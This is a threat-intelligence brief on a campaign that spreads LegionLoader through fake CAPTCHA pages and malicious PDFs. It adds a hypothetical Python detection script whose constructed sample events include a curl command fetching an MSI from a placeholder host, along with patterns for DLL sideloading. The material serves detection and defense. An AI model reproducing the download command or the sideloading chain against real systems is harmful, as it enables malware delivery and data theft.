2025-04-17

Fake CAPTCHA Campaign Delivers LegionLoader via Malicious PDFs

Level: Tactical | Source: Netskope | Financial, Technology


Another iteration of fake CAPTCHA prompts was identified in a campaign tracked by Netskope since February 2025, used to distribute the LegionLoader malware to users searching for PDF documents online. Victims are lured by fictitious PDFs that appear in search results, leading them to malicious web pages simulating Cloudflare Turnstile CAPTCHAs. These sites prompt users to enable browser notifications, initiating a tailored infection path depending on the user’s response. If notifications are accepted, the flow continues toward malware delivery; otherwise, users are redirected to benign software downloads. Regarding victimology, Netskope reports that "140 Netskope customers located mainly in North America, Asia, and Southern Europe across different segments, led by the technology and financial services sectors" were affected. The attackers leverage a VMware-signed application to sideload a malicious DLL, ultimately executing LegionLoader and deploying a malicious browser extension.

The attack chain begins with a PDF file containing a link to a fake Cloudflare Turnstile CAPTCHA page prompting the user to enable browser notifications. If accepted, the victim is redirected to a set of instructions directing them to open the Windows Run window and execute a command using "curl" to download an MSI file. The attacker’s infrastructure enforces download constraints: Netskope observed that attempts to access the file via a browser return a message citing service rule violations. Running the MSI registers an application named “Kilo Verfair Tools,” which executes custom installer actions "defined in its CustomActions table." One action launches a legitimate PDF reader to maintain the illusion of legitimacy. Additional actions include sending an HTTP POST request to retrieve a password and executing "logd.bat," which extracts DLLs from a 7-Zip archive and runs a signed binary — "mksSandbox.exe" — to initiate DLL sideloading.

The sideloaded DLL, "libcrypto-1_1-x64.dll," launches LegionLoader via shellcode embedded in the binary. The loader allocates memory and applies a custom deobfuscation algorithm using a runtime-generated key. Techniques like API hammering and math obfuscation are applied to hinder analysis. Once decoded, the shellcode decrypts the LegionLoader payload using XTEA and injects it into a newly spawned "explorer.exe" process through process hollowing. LegionLoader then receives a PowerShell script from its command-and-control server, which constructs the next-stage payload through layered string manipulation, base64 decoding, and XOR decryption. A second PowerShell stage continues this approach, using AES decryption to deliver a payload that installs the malicious browser extension.
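As an added, hypothetical detection example (not from the Netskope report or Anvilogic), the Python below flags the observable stages of the chain described in the two paragraphs above, run over constructed Sysmon-style process-creation and image-load events: explorer.exe spawning curl to fetch an MSI, msiexec launching logd.bat, and mksSandbox.exe side-loading libcrypto-1_1-x64.dll from a user-writable folder. The paths, the placeholder URL and the VMware install-directory control event are assumptions, not values from the page.

```python
"""Hypothetical detection over constructed Sysmon-style events (EID 1 process
create, EID 7 image load) for the chain described above. Sample events,
paths and the placeholder URL are constructed, not real telemetry."""
import re

EVENTS = [
    # Stage 1: user pastes the Run-box command; curl spawned by explorer.exe pulls an MSI.
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -o %TEMP%\setup.msi https://PLACEHOLDER.invalid/dl"},
    # Stage 2: MSI CustomAction runs the batch file that stages the 7-Zip contents.
    {"id": 1, "parent": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd /c "C:\Users\u\AppData\Local\Kilo Verfair Tools\logd.bat"'},
    # Stage 3: signed mksSandbox.exe side-loads libcrypto-1_1-x64.dll from the same user folder.
    {"id": 7, "image": r"C:\Users\u\AppData\Local\Kilo Verfair Tools\mksSandbox.exe",
     "loaded": r"C:\Users\u\AppData\Local\Kilo Verfair Tools\libcrypto-1_1-x64.dll"},
    # Benign control (constructed): the same DLL loaded from a VMware install directory.
    {"id": 7, "image": r"C:\Program Files (x86)\VMware\VMware Workstation\mksSandbox.exe",
     "loaded": r"C:\Program Files (x86)\VMware\VMware Workstation\libcrypto-1_1-x64.dll"},
]

def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]

def run_box_curl_msi(e):
    """explorer.exe -> curl.exe fetching an .msi matches the Run-window lure."""
    return (e["id"] == 1 and _base(e["parent"]) == "explorer.exe"
            and _base(e["image"]) == "curl.exe" and ".msi" in e["cmd"].lower())

def msi_custom_action_bat(e):
    """msiexec.exe launching a .bat is unusual for ordinary installers."""
    return (e["id"] == 1 and _base(e["parent"]) == "msiexec.exe"
            and re.search(r"\.bat\b", e["cmd"], re.I) is not None)

def mkssandbox_sideload(e):
    """mksSandbox.exe loading libcrypto-1_1-x64.dll outside a VMware directory."""
    return (e["id"] == 7 and _base(e["image"]) == "mkssandbox.exe"
            and _base(e["loaded"]) == "libcrypto-1_1-x64.dll"
            and "\\vmware\\" not in e["loaded"].lower())

RULES = (run_box_curl_msi, msi_custom_action_bat, mkssandbox_sideload)

def detect(events):
    """Return (rule_name, event) hits in event order."""
    return [(r.__name__, e) for e in events for r in RULES if r(e)]

def chain_stages(events):
    """Number of distinct stages seen; two or more on one host is a strong signal."""
    return len({name for name, _ in detect(events)})
```

Each rule on its own is a lead; correlating two or more stages on the same host within a short window is what separates this chain from a legitimate VMware installation loading the same DLL name.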

The extension is described by Netskope as "a malicious browser extension named ‘Save to Google Drive,’ which looks to imitate the legitimate extension." It is compatible with multiple browsers — Chrome, Edge, Brave, and Opera — and is activated by modifying the Secure Preferences file that stores browser configurations. Its "manifest.json" file includes permissions allowing script execution, clipboard access, system fingerprinting, and collection of browsing data. The extension harvests sensitive information such as cookies, browser history, and Bitcoin transaction data, which is then exfiltrated to attacker-controlled infrastructure. This campaign remains an active threat due to its layered PowerShell payloads, DLL sideloading tactics, and effective use of CAPTCHA-based user interaction.
